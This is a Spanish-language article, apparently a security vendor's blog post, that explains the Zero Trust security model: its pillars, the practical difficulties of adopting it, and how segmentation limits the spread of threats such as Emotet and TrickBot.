Por ejemplo, al configurar centros de datos y recursos, las organizaciones pueden tener que comenzar casi desde cero, especialmente si los sistemas heredados son incompatibles con el marco de Zero Trust, y a menudo lo son. Pero incluso si las empresas no tienen que comenzar desde cero, es posible que deban reorganizar funciones específicas dentro de su política de seguridad, como la forma en que implementan el software o los empleados a bordo, o qué métodos de almacenamiento utilizan.

Fortalezas de la confianza cero

La creación de Zero Trust en los cimientos de la infraestructura de una organización puede fortalecer muchos de los pilares sobre los que se basan la TI y la seguridad. Ya sea para reforzar las políticas de identificación y acceso o segmentar los datos, al agregar algunas barreras simples de entrada y permitir el acceso según sea necesario, Zero Trust puede ayudar a las organizaciones a fortalecer su postura de seguridad y limitar su superficie de ataque.

Aquí hay cuatro pilares de Zero Trust que creemos que las organizaciones deberían adoptar:

• Identificación sólida de usuarios y políticas de acceso
• Segmentación de datos y recursos.
• Fuerte seguridad de datos en almacenamiento y transferencia
• Orquestación de seguridad

Identificación de usuario y acceso

El uso de una combinación segura de factores en la autenticación multifactor (MFA) debería proporcionar a los equipos información suficiente sobre quién realiza una solicitud, y una estructura de política bien pensada debería confirmar a qué recursos pueden acceder en función de esa identificación.

Muchas organizaciones bloquean el acceso a datos y aplicaciones al optar por plataformas en la nube de identidad como servicio (IDaaS) que utilizan servicios de inicio de sesión único. En un modelo de Zero Trust, ese acceso se protege aún más al verificar quién solicita el acceso, el contexto de la solicitud y el riesgo del entorno de acceso antes de otorgar la entrada. En algunos casos, eso significa limitar la funcionalidad de los recursos. En otros, podría estar agregando otra capa de autenticación o tiempos de espera de sesión.

Segmentación

Sin embargo, las políticas de acceso sólidas no tendrán sentido sin una segmentación adecuada de datos y recursos. La creación de un gran conjunto de datos donde todos los que pasan la prueba de acceso pueden participar y tomar lo que quieran, no protege los datos confidenciales de ser compartidos, ni impide que los iniciados utilicen mal las herramientas de seguridad u otros recursos .

Al dividir segmentos de la red de una organización en compartimentos, Zero Trust protege la propiedad intelectual crítica de usuarios no autorizados, reduce la superficie de ataque al mantener bien protegidos los sistemas vulnerables y evita el movimiento lateral de amenazas a través de la red. La segmentación también puede ayudar a limitar las consecuencias de las amenazas internas, incluidas las que pueden provocar un peligro físico para los empleados .

Seguridad de datos

Incluso con la restricción del acceso a los datos y la reducción de la superficie de ataque a través de la segmentación, las organizaciones están abiertas a violaciones, fugas de datos e interceptación de datos si no aseguran sus datos en el almacenamiento y en tránsito. El cifrado de extremo a extremo, los datos cifrados, las copias de seguridad automáticas y la seguridad de los depósitos con fugas son formas en que las organizaciones pueden adoptar Zero Trust en su plan de seguridad de datos.

Orquestación de seguridad

Finalmente, dibujar un hilo a través de todos estos pilares es la importancia de la orquestación de seguridad. Incluso sin un sistema de gestión de seguridad, las organizaciones que usan Zero Trust necesitarían garantizar que las soluciones de seguridad funcionen bien juntas y cubran todos los posibles vectores de ataque. La superposición no es un problema en sí misma, pero puede ser complicado encontrar la configuración correcta para maximizar la eficiencia y minimizar los conflictos.

Desafíos de la estrategia Zero Trust

Zero Trust se presenta como un enfoque integral para asegurar el acceso a través de redes, aplicaciones y entornos de usuarios, dispositivos de usuarios finales, API, IoT, microservicios, contenedores y más. Si bien tiene como objetivo proteger a la fuerza laboral, las cargas de trabajo y el lugar de trabajo, Zero Trust se enfrenta a algunos desafíos. Éstos incluyen:

• Más y diferentes tipos de usuarios (en oficina y remotos)
• Más y diferentes tipos de dispositivos (móviles, IoT, biotecnología)
• Más y diferentes tipos de aplicaciones (CMS, intranet, plataformas de diseño)
• Más formas de acceder y almacenar datos (unidad, nube, borde)

Los usuarios

En un pasado no muy lejano, era común que la gran mayoría de la fuerza laboral pasara la totalidad de sus horas de trabajo en su lugar de trabajo. No es cierto hoy, donde, según Forbes, al menos el 50 por ciento de la población de los EE. UU. Se dedica a alguna forma de trabajo remoto. Eso significa acceder a los datos de las direcciones IP, enrutadores o Wi-Fi público, a menos que use un servicio VPN.

Pero los usuarios no están necesariamente limitados a una fuerza laboral. Los clientes a veces necesitan acceder a los recursos de una organización, dependiendo de la industria. Considere a los clientes que desean seleccionar pedidos para su próxima entrega, verificar el inventario, participar en demostraciones o ensayos y, por supuesto, acceder al sitio web de una empresa. Los proveedores y las empresas de servicios de terceros pueden necesitar acceso a otras partes de la infraestructura de una organización para verificar las operaciones, la seguridad y el progreso.

Todas estas instancias apuntan a una amplia variación en la base de usuarios y a un mayor número de puntos de acceso para cubrir. Elaborar políticas específicas para cada uno de estos grupos e individuos puede llevar mucho tiempo, y mantener la afluencia constante de nuevos empleados y clientes agregará una carga de trabajo considerable para quien maneje esta tarea en el futuro.

Dispositivos

En esta era de políticas BYOD y equipos de IoT, además de la mentalidad de «siempre activo» que a veces afecta a los empleados remotos, las organizaciones deben permitir una gran variación en los dispositivos utilizados para el trabajo, así como los sistemas operativos que vienen con ellos. Cada uno de estos dispositivos tiene sus propias propiedades, requisitos y protocolos de comunicación, que deberán ser rastreados y asegurados bajo el modelo Zero Trust. Una vez más, esto requiere un poco más de trabajo por adelantado, pero probablemente arroje resultados positivos.

Aplicaciones

Otro factor desafiante a tener en cuenta al adoptar una estrategia Zero Trust es la cantidad de aplicaciones en uso en toda la organización para que las personas y los equipos colaboren y se comuniquen. La más versátil de estas aplicaciones está basada en la nube y se puede usar en múltiples plataformas. Sin embargo, esta versatilidad puede ser un factor complicado al decidir qué desea permitir y qué no.

¿Se comparten las aplicaciones con servicios, agencias o proveedores de terceros? ¿Las plataformas de comunicación están orientadas hacia el exterior, y no solo para los empleados? ¿Es esta aplicación necesaria solo para un departamento en particular, como finanzas, diseño o programación? Todas estas preguntas deben formularse y responderse antes de adoptar ciegamente una pila de 60 aplicaciones para toda la fuerza laboral.

Datos

Una razón por la cual las antiguas políticas de seguridad están creciendo en desgracia es que no hay una ubicación fija que deba protegerse por más tiempo. Las organizaciones no solo pueden proteger los puntos finales o las redes corporativas. Cada vez se almacenan más recursos, datos e incluso aplicaciones en entornos basados ​​en la nube, lo que significa que se puede acceder a ellos desde cualquier lugar y que pueden depender de granjas de servidores en varias ubicaciones globales.

Esto se complica aún más por el posible cambio a la informática de punta, que requerirá que los equipos de TI cambien de una infraestructura centralizada de arriba hacia abajo a un modelo de confianza descentralizado. Como hemos visto en nuestra serie sobre recursos en la nube con fugas ( buckets de AWS y servidores elásticos ), la configuración de la infraestructura de datos en los servicios en la nube y más allá tendrá que ser perfecta si las empresas no quieren que termine como el eslabón más débil en su Estrategia de confianza cero.

Confiar o no confiar

La revisión a un marco de seguridad Zero Trust no se logra fácilmente, pero creemos que es una fortaleza para la postura y la conciencia de seguridad general de una organización. Los equipos de TI que buscan convencer a los ejecutivos de la vieja guardia pueden buscar oportunidades principales, entonces, para argumentar. Por ejemplo, si ya hay un movimiento planificado hacia recursos basados ​​en la nube, es un buen momento para sugerir también adoptar Zero Trust.

Los cambios en el panorama de amenazas, incluidas las vulnerabilidades recientes en VPN y Citrix, más el ransomware que se entrega a través del Protocolo de escritorio remoto (RDP), podrían alentar a más organizaciones a investigar una solución de Confianza Cero, aunque solo sea para la gestión de identidad y acceso. Estas organizaciones tendrán que permitir un período de transición y estar preparados para algunos cambios importantes.

Un marco apropiado de Zero Trust que no permita automáticamente el tráfico dentro del perímetro ciertamente obstaculizará el movimiento de amenaza lateral que los piratas informáticos usan para apretar su agarre en una red violada. Las principales amenazas centradas en el negocio, como Emotet y TrickBot, se verían obstaculizadas de propagarse, ya que no podrían trabajar de un servidor a otro en una red segmentada. Dado que el punto de infiltración generalmente no es la ubicación objetivo de un atacante, la configuración de los perímetros internos también puede limitar la gravedad de un ataque exitoso.

Agregue a estas capas una fuerte higiene de la seguridad de los datos y una orquestación inteligente que brinde una amplia cobertura en todos los tipos de amenazas, sistemas operativos y plataformas, y las empresas tienen un marco de seguridad que sería bastante difícil de superar hoy en día. A nuestros ojos, eso hace que Zero Trust sea un héroe.